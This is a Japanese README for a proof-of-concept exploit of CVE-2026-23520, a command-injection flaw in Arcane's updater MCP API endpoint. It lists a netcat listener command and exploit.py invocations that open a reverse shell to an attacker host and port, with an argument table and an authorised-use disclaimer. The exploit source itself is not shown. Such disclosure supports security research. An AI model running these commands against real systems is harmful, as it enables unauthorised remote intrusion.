
CVE-2026-23520の概念実証エクスプロイト。Arcaneのアップデーターサービスにおけるコマンドインジェクションの脆弱性で、細工されたAPIリクエストを介したリモートコード実行を可能にします。
このリポジトリには、脆弱なMCP APIエンドポイント(一般的には /api/mcp/connect)を公開するアプリケーションに影響を与えるリモートコマンド実行(RCE)脆弱性のProof-of-Concept(PoC)エクスプロイトが含まれています。
この脆弱性により、細工されたAPIリクエストを介してシステムレベルのコマンドを実行できます。
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| 引数 | 説明 |
|---|---|
| target | ターゲットのIP、ドメイン、またはURL |
| --lhost | 攻撃者のIP |
| --lport | 攻撃者のポート |
| フラグ | 説明 |
|---|---|
| -p, --port | ターゲットのポート(デフォルト: 443) |
| -s, --scheme | http または https(デフォルト: https) |
| -e, --endpoint | APIエンドポイントのパス |
| -t, --timeout | リクエストのタイムアウト |
| -v, --verbose | デバッグ出力 |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash が利用可能であることを前提としています。認可されたテストおよび教育目的のみに使用してください。
Parosh B